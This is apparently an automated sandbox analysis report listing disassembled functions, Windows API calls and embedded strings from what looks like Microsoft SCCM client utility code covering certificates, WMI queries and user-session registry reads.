                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertCertificateCompareH_prolog3H_prolog3_catchH_prolog3_catch_Name
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 != pIssuerNameBlobs$CcmGetCertNameStr(pIssuerNameBlobs[idx], sIssuerName)$CcmGetCertSubjectNameEx(pCertContext, sSubjectName)$CcmUtilLib::CcmIsAllowedIssuer$Issuer: [%s] Expected Issuer: [%s]$nIssuers >= 1$t)l
                                                                                          • API String ID: 1624474820-562805160
                                                                                          • Opcode ID: 4c78c40108e0862226e809304c54f3de31cc2138ff954e7de620169ad56437b6
                                                                                          • Instruction ID: f4f26aef473be13b136bc002834492fdb3706e0466bb9445ca2f2b39f2f0b2c1
                                                                                          • Opcode Fuzzy Hash: 4c78c40108e0862226e809304c54f3de31cc2138ff954e7de620169ad56437b6
                                                                                          • Instruction Fuzzy Hash: FE81E470D41B59EACF20DFA4DC4ABEDBBB9AF55714F148045F802BB282C7785A06CB60
                                                                                          Function 005F433E Relevance: 50.9, APIs: 8, Strings: 21, Instructions: 150threadmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F4345
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F439F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4402
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4453
                                                                                          • CoTaskMemAlloc.OLE32(?,?,00000000,?,00000001,?,?,CCM::Utility::String::CoAllocString,00000020,0063C82E,00000000,?,?,?,?,CCM::LocationServices::CcmGetHomeMPFromWMIEx), ref: 005F4469
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F449F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F44F2
                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,?), ref: 005F452E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Task$AllocFreeH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pszDest != 0) != 0$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::CoAllocString$StringCchCopyW( pszDest, uLength, c_str() )$ULongAdd(1, (ULONG)length(), &uLength)$ULongMult(uLength, sizeof(WCHAR), &cbLength)$pszString != 0
                                                                                          • API String ID: 3351718187-1587873651
                                                                                          • Opcode ID: 838d3e5b7ee5094fa832d53e7ea7728960430a53a0ce3fa413d99d7e52064204
                                                                                          • Instruction ID: 381a98f1198fa5146c1451ee5f28a902821f6bf90a6ef876077300aecd182211
                                                                                          • Opcode Fuzzy Hash: 838d3e5b7ee5094fa832d53e7ea7728960430a53a0ce3fa413d99d7e52064204
                                                                                          • Instruction Fuzzy Hash: 755194B1A80329AEDB119FA09D06FBF7EB5BB54B14F144055FA40BB2C1C7BD5A418BA0
                                                                                          Function 006130CD Relevance: 49.2, APIs: 5, Strings: 23, Instructions: 177threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006130D4
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061312F
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006131B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00613217
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00613265
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00613260
                                                                                          • ..\usertoken.cpp, xrefs: 00613137
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00613212
                                                                                          • ..\usertoken.cpp, xrefs: 0061326D
                                                                                          • ..\usertoken.cpp, xrefs: 00613207
                                                                                          • ..\usertoken.cpp, xrefs: 00613255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006131AC
                                                                                          • ,hw, xrefs: 00613307
                                                                                          • shUserKey.GetDword(c_szCcmCachedUserSessionIDValue, pdwSessionId), xrefs: 0061325B
                                                                                          • shUserKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szCcmCachedUserKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010, xrefs: 006131A7
                                                                                          • Cached CCM (user, session) is: (%s,%d)., xrefs: 006132AE
                                                                                          • Failed to retrieve current (user,session) pair (0x%08x)., xrefs: 00613316
                                                                                          • ..\usertoken.cpp, xrefs: 0061311F
                                                                                          • UserSID, xrefs: 006131DF
                                                                                          • CCM::Utility::Security::GetCcmUserSessionPair, xrefs: 006130E9
                                                                                          • ..\usertoken.cpp, xrefs: 006131A1
                                                                                          • ..\usertoken.cpp, xrefs: 006131B9
                                                                                          • 0 != pdwSessionId, xrefs: 00613125
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061312A
                                                                                          • shUserKey.GetString(c_szCcmCachedUserValue, sUserSid), xrefs: 0061320D
                                                                                          • ..\usertoken.cpp, xrefs: 0061321F
                                                                                          • Session, xrefs: 00613229
                                                                                          • Software\Microsoft\SMS\CurrentUser, xrefs: 00613174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,hw$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$..\usertoken.cpp$0 != pdwSessionId$CCM::Utility::Security::GetCcmUserSessionPair$Cached CCM (user, session) is: (%s,%d).$Failed to retrieve current (user,session) pair (0x%08x).$Session$Software\Microsoft\SMS\CurrentUser$UserSID$shUserKey.GetDword(c_szCcmCachedUserSessionIDValue, pdwSessionId)$shUserKey.GetString(c_szCcmCachedUserValue, sUserSid)$shUserKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szCcmCachedUserKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010
                                                                                          • API String ID: 288237175-2138071032
                                                                                          • Opcode ID: d7e6bc145ff061cf3deee1a26870513bdc5935cf65fae9b92dc5ea59bb2cc542
                                                                                          • Instruction ID: e6420e4c8695a33889c2683851ea26445fcaf1556505f9f5790d082aebe08a56
                                                                                          • Opcode Fuzzy Hash: d7e6bc145ff061cf3deee1a26870513bdc5935cf65fae9b92dc5ea59bb2cc542
                                                                                          • Instruction Fuzzy Hash: 5F51E471980665BACF10EBA08D0EBEE7E616F41B54F188044F9097B3C2C7B95B45C7A1
                                                                                          Function 00603114 Relevance: 49.2, APIs: 6, Strings: 22, Instructions: 164threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060311B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060316E
                                                                                            • Part of subcall function 0060147F: CoQueryProxyBlanket.OLE32(00000002,0000000A,00000008,00000000,?,00000000,00000000,00000000,00000000), ref: 006014B8
                                                                                            • Part of subcall function 0060147F: CoSetProxyBlanket.COMBASE(00000002,000000FF,000000FF,00000000,00000000,00000003,00000000,00000020), ref: 006014E2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006031CD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00603257
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006032D4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060331D
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006031C8
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006032C4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006032CF
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603325
                                                                                          • CCM::Utility::Wmi::Namespace::Open, xrefs: 00603127
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060330D
                                                                                          • pParentNamespace->OpenNamespace( BString(pszNamespace), 0, pContext, NamespacePtr::operator &(), NULL ), xrefs: 0060324D
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006031BD
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060325F
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060315E
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006032DC
                                                                                          • SetNamespacePath(), xrefs: 006032CA
                                                                                          • ..\WmiNamespace.cpp, xrefs: 0060317A
                                                                                          • pParentNamespace != 0, xrefs: 00603164
                                                                                          • pszNamespace != 0, xrefs: 006031C3
                                                                                          • AllowImpersonation(getPointer()), xrefs: 00603313
                                                                                          • Failed to open to WMI namespace '%s' (%08lx), xrefs: 00603285
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603169
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603252
                                                                                          • ..\WmiNamespace.cpp, xrefs: 00603245
                                                                                          • ..\WmiNamespace.cpp, xrefs: 006031D9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00603318
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$BlanketProxy$H_prolog3_catchQuery
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$..\WmiNamespace.cpp$AllowImpersonation(getPointer())$CCM::Utility::Wmi::Namespace::Open$Failed to open to WMI namespace '%s' (%08lx)$SetNamespacePath()$pParentNamespace != 0$pParentNamespace->OpenNamespace( BString(pszNamespace), 0, pContext, NamespacePtr::operator &(), NULL )$pszNamespace != 0
                                                                                          • API String ID: 2266875516-2336866345
                                                                                          • Opcode ID: 0b1821843909ace47b55ee4370504216f83354f538312c1827c89a1d3670a513
                                                                                          • Instruction ID: 600390a66539ccc8c31bd51ee167f2768deb4cc950f4a64e6aed6ff9628f30b4
                                                                                          • Opcode Fuzzy Hash: 0b1821843909ace47b55ee4370504216f83354f538312c1827c89a1d3670a513
                                                                                          • Instruction Fuzzy Hash: 7C51D6B1A80355BACB119F908C0ABEF7F2AAF95B11F148045F9047B3C1C7B95A01C7A6
                                                                                          Function 00622142 Relevance: 47.4, APIs: 9, Strings: 18, Instructions: 172threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00622149
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006221AF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062220F
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,42000003,00000000,00000000), ref: 0062223D
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062224A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622280
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,42000003,?,?), ref: 006222CF
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 006222D9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062230F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertErrorLastName$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 != pCertContext->pCertInfo$CcmUtilLib::CcmGetCertIssuer$Failed to get certificate issuer. Error 0x%x$dwIssuerLength != 0$dwIssuerLength != 0
                                                                                          • API String ID: 292872062-1564745813
                                                                                          • Opcode ID: 50b18a120f61ea3921da413d881c19feff2da16dce2fa7be23f34acdf0499c2c
                                                                                          • Instruction ID: d318a2ab24f69f0898e0927dc8a348b584740cd39f64997d62ddde96bce6255e
                                                                                          • Opcode Fuzzy Hash: 50b18a120f61ea3921da413d881c19feff2da16dce2fa7be23f34acdf0499c2c
                                                                                          • Instruction Fuzzy Hash: 4D5118B1A40316FADB11EBA49C1AFEE7FA5AF44B10F144115FA00FB2C1D7794A01CB62
                                                                                          Function 0062238D Relevance: 47.4, APIs: 9, Strings: 18, Instructions: 163threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00622394
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006223F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622452
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,02000003,00000000,00000000), ref: 0062246F
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062247C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006224B2
                                                                                          • CertNameToStrW.CRYPT32(00000001,?,02000003,?,?), ref: 00622500
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 0062250A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00622540
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertErrorLastName$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$CcmUtilLib::CcmGetCertNameStr$CertNameBlob.cbData > 0$CertNameBlob.pbData != 0$Failed to get certificate subject name. Error 0x%x]$dwSubjectLength != 0$dwSubjectLength != 0
                                                                                          • API String ID: 292872062-110678374
                                                                                          • Opcode ID: 21f7e100c6b4db04b44d85d9ad02c08d51fee63a094f173f8aa1536d75b9947f
                                                                                          • Instruction ID: cfe91640b292f68962a13326e1cea7794376b20642a3fe6b8b3ad5e2d27edd18
                                                                                          • Opcode Fuzzy Hash: 21f7e100c6b4db04b44d85d9ad02c08d51fee63a094f173f8aa1536d75b9947f
                                                                                          • Instruction Fuzzy Hash: EB514C71680756BAEB20FFA49C1EFEE7EA6AF50B10F144105F914BB3C1D7784A41CAA1
                                                                                          Function 0060B1E6 Relevance: 47.4, APIs: 6, Strings: 21, Instructions: 143threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060B1ED
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B24A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B2A5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B2E6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B341
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060B390
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::CreateMethodInParams$getPointer()->GetMethod(pszMethod, 0, &spInClass, 0)$null() == false$ppInParams != 0$pszMethod != 0$spInClass->SpawnInstance(0, ppInParams)
                                                                                          • API String ID: 981364226-1820322647
                                                                                          • Opcode ID: cba5faca8814a5e0b76fb5fd8160b72f29ca46228fe06cd64bf5c1f1fe1eeec9
                                                                                          • Instruction ID: 85216160a124eed5eb57bf466a15075da36b64d7f37c9a4d8d49517edfebc2b7
                                                                                          • Opcode Fuzzy Hash: cba5faca8814a5e0b76fb5fd8160b72f29ca46228fe06cd64bf5c1f1fe1eeec9
                                                                                          • Instruction Fuzzy Hash: 8341E1B1AC0244AADB14ABA08C0AFFF7E25AF90B16F249045FD047B2C1C7B95B09C795
                                                                                          Function 005F92E6 Relevance: 45.7, APIs: 5, Strings: 21, Instructions: 171threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F92ED
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F937B
                                                                                            • Part of subcall function 0060C143: __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 0060C143: GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F93EF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F943D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F94AC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersion$CcmGetOSVersion failed with 0x%x$Version$WBEM_NO_ERROR == spEnum.Next(&spObject)$root\cimv2$select * from Win32_OperatingSystem$spCimV2.Open(L"root\\cimv2")$spCimV2.Query(c_szWmi_Win32OS_Query, &spEnum)$spObject.GetString(c_szWmi_Version, sOSVersion)
                                                                                          • API String ID: 3275092694-3775640110
                                                                                          • Opcode ID: 24e28a01e712a8e85648dcec279c90aaeb527570fcab7c42bb04c7bff29da5b3
                                                                                          • Instruction ID: 70f6184feddca8f65819861fd8c4cc9c3fc45c29fe9f828ce6c62a92d282aac1
                                                                                          • Opcode Fuzzy Hash: 24e28a01e712a8e85648dcec279c90aaeb527570fcab7c42bb04c7bff29da5b3
                                                                                          • Instruction Fuzzy Hash: 6451A1B0D84758AAEB25EBA4CD1ABEE7F64BF50B00F144059F5017B2C2CBB81B06C751
                                                                                          Function 005B725E Relevance: 45.6, APIs: 5, Strings: 21, Instructions: 143threadCOMMON
